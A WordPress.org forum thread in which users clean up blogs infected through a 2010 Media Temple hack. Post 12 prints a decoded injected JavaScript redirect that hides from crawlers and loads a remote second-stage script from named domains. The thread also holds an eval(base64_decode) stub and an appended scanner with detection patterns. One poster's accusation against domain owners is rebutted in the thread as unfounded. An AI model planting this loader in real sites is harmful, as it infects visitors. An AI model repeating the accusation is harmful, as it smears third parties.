WordPress.org

Blog infected with malware (26 posts)

  1. HalfAsstic
    Member
    Posted 4 years ago #

    My blog is infected with malware on the site. I have changed my password and installed the WPMalwatch. It was run and found nothing.
    Some of the links my readers are seeing on the sign that pops up as a warning are:
    Threat Name: Exploit Phoenix Exploit Kit (Type 1112)
    File Name: decorum76.info/e9t/
    And:
    "The website at http://www.halfasstic.com contains elements from the site novelounge.com, which appears to host malware - software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
    For detailed information about the problems with these elements, visit the Google safe browsing diagnostic page for novelounge.com."

    1. Can anyone tell me what to do to get this off of my blog?
    2. If this is something that is over my head, who can I hire to do it for me?
    Thanks so much!

  2. stevesearer
    Member
    Posted 4 years ago #

    I had the same issue you are describing, but was able to find and get rid of the problem. Basically, I noticed a couple of oddities occur before the Malware warning appeared.

    1) The main one was the fact that there were 2 new admin users that I had not created. I promptly deleted those.

    2) After realizing that there must have been code inserted into the website, I began searching through the template files to see if I found anything fishy. When I opened the 'Page Template' file, I noticed an extremely long and gibberish looking php string that began with "<?php $o =". I promptly deleted that as well.

    After doing both of these things, as well as clearing the cookie and site data in Chrome, revisiting my website seems to be working again without the Malware warning.

  3. stevesearer
    Member
    Posted 4 years ago #

    3) I also changed my password and instructed the other admins on my site to do the same.

  4. zackisaiah
    Member
    Posted 4 years ago #

    I had the same problem. All of the WordPress sites on my MediaTemple gridserver were infected. Chrome gave me the "novelounge.com" malware warning.

    Initially, I updated to WP 3.0 and removed the "JohnnyA" admin user that had appeared. This seemed to solve the problem. The next day, however, I got the malware warning again.

    Checked out the functions.php file and sure enough the "<?php $o =" code was there. Found it in archive.php on a different site. Removed it, and the malware warnings went away. I'll be monitoring the sites in the meantime to make sure the problem is truly fixed.

  5. cleave
    Member
    Posted 4 years ago #

    I've been experiencing the same problem on all of my sites. pomomusings.com had the warning, as did cleavedesign.com, and on another site, sarahwalkercleaveland.com, I can't even get into the wp-admin.

    I have 20+ sites hosted with MediaTemple and it looks like this is a problem with their server. Have you brought it to their attention yet?

    I'm on vacation in Hawaii trying to get in to WordPress admins on my iPad and trying to make some of these changes....

    Peace,
    Adam

  6. stevesearer
    Member
    Posted 4 years ago #

    Adam, you are correct with it being a MediaTemple issue. The link is here:

    http://weblog.mediatemple.net/weblog/category/system-incidents/1378-information-about-compromised-sites

  7. stevesearer
    Member
    Posted 4 years ago #

    The problem came up again today, though I have been unsuccessful in identifying where the novelounge.com code is being inserted into my website.

    However, I did delete unused plugins, one being a contact form plugin that became activated mysteriously (I don't remember activating it). I also cleared the WP-Super-cache and the problem seems to be gone at this point. But after thinking I was successful yesterday, I am not going to be over-confident.

    The domain is officesnapshots.com, if anyone wants to check it out and let me know if they are receiving the warning in Google Chrome, I'd really appreciate it.

    Thanks!

  8. zackisaiah
    Member
    Posted 4 years ago #

    Got the malware warning again on one of the sites I thought I fixed. (I had removed the mysterious user with admin privileges, removed the "<?php $o =" code, and reset the password for my wp admin account.)

    This time, I cleared the wp-super-cache data and deactivated the plugin entirely, and that cleared the malware warning (for now). I realized I had not changed passwords for other administrators on the site, so I did that and noticed that WordPress said I had one more administrator than I was seeing. The user count says "Administrator (4)" but I only see three. I checked the wp_users table in the database, and no sign of the ghost admin. Hmm...

    Looks like I have to dig deeper.

    (Steve: I didn't get the malware warning on your site.)

  9. johnferris
    Member
    Posted 4 years ago #

    Stevesearer – interesting, I also installed a contact form plugin (TDO Mini Forms) a day or two before I got hit with the same problem. Anyone else got that plugin? Media Temple are very helpful - pretty much delete and start again. Very handy when you've 600 posts and images etc. to deal with. Anyone know if this malware causes any damage to anyone who opens it? I'm sending an email out to readers and I'd like to say something.

  10. stevesearer
    Member
    Posted 4 years ago #

    Hey guys, so I think I may have gotten rid of whatever the problem was. We'll see in a day or so if it stays non-Malwared (word?).

    Here are the things I did:
    -Uninstalled unused plugins
    -changed wordpress passwords
    -updated wordpress
    -reuploaded and overwrote all wordpress files
    -changed ftp password
    -changed ftp to secure protocol for when I connect
    -changed Mysql passwords
    -manually deleted malicious code on site using the following tool:

    http://jsunpack.jeek.org/dec/go?

    I would enter my domain name into the box and click "submit URLs". It might take some time, but eventually it would spit out a bunch of data. I would just scroll through each entry and look for where the code had been placed. I'd say do that after you change all of your passwords, as my research made it seem that compromised passwords were the issue.

    -Steve

  11. zackisaiah
    Member
    Posted 4 years ago #

    Got a message from MT this morning:

    We may have an additional "cleanup" option available via a third party. We hope to announce plans about that at the end of this week. Please stay tuned to our Status Blog for more details.

  12. zackisaiah
    Member
    Posted 4 years ago #

    Thanks for that very helpful link, Steve.

    I scanned one of my affected sites and this is what jsunpack decoded:
    //document.write (s)
    <script type="text/javascript">
    var a=window.navigator.userAgent,
        b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,   // search-engine crawlers are skipped
        c=navigator.appVersion;
    // Fires only once per visitor (the "watchtime" cookie), never for crawlers, and only for Windows clients
    if(document.cookie.indexOf("watchtime")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){
      var d=["edisonsnightclub.com","gaindirectory.org","ideacoreportal.com","karenegren.com"],
          e=["aqua.","azure.","black.","blue.","brown.","chocolate.","coral.","cyan.","darkred.","fuchsia.","gold.","gray.","green.","indigo.","ivory.","khaki.","lime.","magenta.","maroon.","navy.","olive.","orange.","pink.","plum.","purple.","red.","silver.","snow.","violet.","white.","yellow."],
          f=Math.floor(Math.random()*d.length),   // random host from d
          g=Math.floor(Math.random()*e.length);   // random colour-named subdomain from e
      dt=new Date;
      dt.setTime(dt.getTime()+9072E4);   // cookie expires after 90,720,000 ms (about 25 hours)
      document.cookie="watchtime="+escape("watchtime")+";expires="+dt.toGMTString()+";path=/";
      // Loads the second-stage script from http://<colour>.<domain>/data/mootools.js
      document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/data/mootools.js"><\/script>')
    };
    </script>

    Removed the code from the file, but have yet to change all of my passwords...

  13. Media Temple
    Member
    Posted 4 years ago #

    We just wanted to clear the air of some of the confusion surrounding recent hacks on WordPress installations hosted on (mt) Media Temple.

    This issue does not relate to previous security incidents #1167 and #1026 - which were absolutely reflective of an inadequately secure architecture. We've accepted responsibility for those past issues, corrected them and have done so publicly: http://weblog.mediatemple.net/weblog/category/system-incidents/gs-investigating-potential-exploit/ and http://weblog.mediatemple.net/weblog/category/system-incidents/1026-gs-security-advisory/. In total, we've observed that these more recent attacks are site-specific, and do not represent a hosting-level compromise.

    We have provided some significant guidance and support for our customers experiencing these problems on our System Status Blog: http://weblog.mediatemple.net/weblog/category/system-incidents/1378-information-about-compromised-sites/

  14. johnferris
    Member
    Posted 4 years ago #

    Steve, I deleted the malicious code, deleted the user Johnny A, changed passwords and two days later I'm back to having a different Malware. Nice of Media Temple to offer the solution to start again but when you've customized templates etc. it's not that simple.

  15. chinmoy
    Member
    Posted 4 years ago #

    Set the PHP file permissions to 404 or 444, JS files to 555 and folders to 555. Don't give the "write" permission to files and folders. Please check all JS files thoroughly. You will see document.write('.....'); code at the bottom of every JS file. Remove that kind of code from the JS files. Change the FTP details, email and admin password.

  16. Arian Xhezairi
    Member
    Posted 4 years ago #

    Luckily MT fellers have reacted right in time I'd say, although a couple of our visitors might have been kicked away from our loved WordPress blogs and sites.

    They've come up with a very easy solution.

    Here's full details on this matter: http://wiki.mediatemple.net/w/WordPress_Redirect_Exploit

    Carry on WordPressing friends.

  17. zackisaiah
    Member
    Posted 4 years ago #

    None of my sites had the malicious code in the wp_posts table as MT warned. I did, however, have the Malware Detected! warning in Chrome. I've managed to clean my sites. Here are the steps I took:

    1. Upgrade to WP 3.0
    2. Delete the "JohnnyA" admin user (this was the only variation I saw, though there may be others.)
    3. Scan all of the theme files for malicious code. 95% of the time the code was found on a standard theme file (such as header.php), but I did find it on some custom template files as well. On one site I found the code buried inside of an old "Statcounter" script.
    4. Go to http://jsunpack.jeek.org/dec/go and scan the site for code inserted in plugins or the wp-includes folder. It was usually found in the Google Analyticator or Cryptx plugins (which I simply deleted and re-installed). In other instances, it was in the wp-includes jquery or thickbox files.
    5. Delete the wp-super-cache cache and back to normal.

    For good measure I changed admin and db passwords, but the sites I haven't changed yet haven't had a recurrence. While this has been a hassle, it's gotten me off my butt to lock down the security on all my sites.

  18. Michelle Panulla
    Member
    Posted 4 years ago #

    I've had the same issue, and believe there is a back door somewhere in my client's WordPress installation. I installed the WordPress File Monitor plugin after the initial hacking, and it alerted me today that more malicious files were added yesterday, despite removing all malicious code previously.

    I also discovered that two plugins were installed and activated that I did not put there: "Redirect" for redirecting via custom fields and "Search & Replace" for replacing strings in the database.

    I'm biting the bullet and doing a fresh WordPress installation, along with repeating all the password changes, etc. I've already done.

  19. johnferris
    Member
    Posted 4 years ago #

    You all seem to have lucked out. I have changed database passwords, WordPress login passwords, deleted the admin users that shouldn't have been on there. All of the above and the frickin' thing keeps coming back. I have 11 sites based on WordPress and five of them are infected. The thought of having to redo all the customisation etc. is killing me.

  20. Roy
    Member
    Posted 4 years ago #

  21. johnferris
    Member
    Posted 4 years ago #

    Thanks Roy, I think it's going to be best to start from scratch again. Wipe directories and databases and start afresh, I can copy the text and images down, last thing we need is anyone getting the Malware message – though the one saving grace is that the sites infected are for annual events and are very rarely read at other times of the year.

  22. Roy
    Member
    Posted 4 years ago #

    I'll leave it to you to judge what's least work. Be aware of images though. Hacks often contain bogus JPGs.

  23. sahaskatta
    Member
    Posted 3 years ago #

    Okay, a few of my websites and sites that I manage for others were hacked from the same ideacoreportal.com. All were on different servers, different accounts, different passwords, etc. One of them was a MediaTemple server.

    How exactly can we report or have that company stopped from what they are doing?

    The following company also owns these domains that were part of the redirect script: ["edisonsnightclub.com","gaindirectory.org","ideacoreportal.com","karenegren.com"]

  24. Repeel
    Member
    Posted 3 years ago #

    Sahaskatta, these assumptions are all wrong, it's an acknowledged hack of servers that were not in the possession or control of the people or entities you list above. The owners of the domains are definitely not complicit, nor was it likely that the originating poster was.

    The Phoenix Exploit Kit has been implicated in issues in the realm of these posts.

    See http://community.websense.com/blogs/securitylabs/archive/2010/08/05/Media-Temple-injections-lead-to-Phoenix-Exploit-Kit.aspx

    and http://blogs.computerworld.com/16904/mass_injections_and_malware_continue_at_media_temple

    It's not a good idea, or fair, to place the data above in a blog post when you're not certain about the facts, as erroneous information defames the parties.

    As much as you want to "have that company stopped", the ones you unwittingly think are behind this, they probably want to stop you or Skattertech from spreading false impressions.

    Someone attempted to maliciously point those domains to a hacked server, but the domains and contacts you list were surely not complicit. This could even be a registrar breach.

    The domains above don't show any involvement with this attack and are clean.

    Sahaskatta and zackisaiah - to be fair and more important, to be accurate, you should remove these errant publications of opinions/assumptions about the domains and registrants.

  25. iPhone Repairs
    Member
    Posted 3 years ago #

    Just removed malicious code from my site http://www.onsiteiphonerepairs.co.uk found in SEO plugin:

    eval(base64_decode("[long base64 payload omitted]"));?>

    Hope this helps someone!
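A defender-side scan for the indicators posters in this thread reported: the "<?php $o =" string in template files, eval(base64_decode(...)) in a plugin, the "watchtime" cookie and search-bot user-agent filter of the decoded redirect script, and document.write of a remote script at the bottom of .js files. This is an added example, not code from the thread, WordPress or Media Temple; the indicator names, the 200-character string threshold, the 2 KB tail window and the sample files are my own constructed assumptions.

```python
# Added example: scan a WordPress tree for the injection indicators reported in this thread.
import os
import re
import shutil
import tempfile
from pathlib import Path
INDICATORS = [  # (indicator name, regex, suffixes it is applied to)
    # PHP payload hidden behind eval(base64_decode(...)), as in the SEO plugin.
    ("php_eval_base64", re.compile(r"eval\s*\(\s*base64_decode\s*\("), (".php",)),
    # '<?php $o =' followed by a long gibberish string (200+ chars is an assumed threshold).
    ("php_obfuscated_o", re.compile(r"<\?php\s+\$o\s*=\s*['\"][^'\"]{200,}"), (".php",)),
    # Cookie the injected redirect sets so a victim is served only once.
    ("watchtime_cookie", re.compile(r"\bwatchtime\b"), (".php", ".js", ".html")),
    # User-agent filter the redirect uses to hide from search crawlers.
    ("ua_bot_filter", re.compile(r"\(yahoo\|search\|msnbot\|yandex\|googlebot\|bing\|ask\)", re.I), (".php", ".js", ".html")),
]
# document.write('<script ... src="http://...') near the end of a .js file; only the tail
# is checked so legitimate document.write calls elsewhere in the file do not fire.
TAIL_WRITE = re.compile(r"document\.write\s*\(\s*['\"]<script[^)]*src=['\"]?http", re.I)
TAIL_BYTES = 2048

def scan_file(path):
    """Return the indicator names found in one file (empty list if clean or unreadable)."""
    try:
        text = Path(path).read_text(encoding="utf-8", errors="replace")
    except OSError:
        return []
    suffix = Path(path).suffix.lower()
    hits = [name for name, rx, sfx in INDICATORS if suffix in sfx and rx.search(text)]
    if suffix == ".js" and TAIL_WRITE.search(text[-TAIL_BYTES:]):
        hits.append("js_tail_remote_script")
    return hits

def scan_tree(root):
    """Map each suspicious file (path relative to root) to its indicator names."""
    root, findings = Path(root), {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            p = Path(dirpath) / fn
            if hits := scan_file(p):
                findings[p.relative_to(root).as_posix()] = hits
    return findings

def demo():
    """Write a constructed sample install to a temp dir, scan it, return the findings."""
    sample = {  # constructed file contents, not real infected files
        "index.php": "<?php require 'wp-blog-header.php'; ?>\n",
        "wp-content/themes/t/header.php": '<?php $o = "' + "Q" * 300 + '"; eval(base64_decode($o)); ?>\n',
        "wp-content/plugins/seo/seo.php": '<?php eval(base64_decode("aGVsbG8=")); ?>\n',
        "wp-includes/js/jquery.js": "function legit(){ document.write('<p>hi</p>'); }\n"
        "document.write('<script type=\"text/javascript\" src=\"http://host.invalid/data/mootools.js\"><\\/script>')\n",
    }
    root = Path(tempfile.mkdtemp())
    try:
        for rel, body in sample.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(body, encoding="utf-8")
        return scan_tree(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)
```

Run scan_tree() against a copy of the install and compare hits against a fresh WordPress download of the same version; a clean file should produce no hits, and any flagged plugin is simplest to delete and reinstall as posters above did.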

Topic Closed

This topic has been closed to new replies.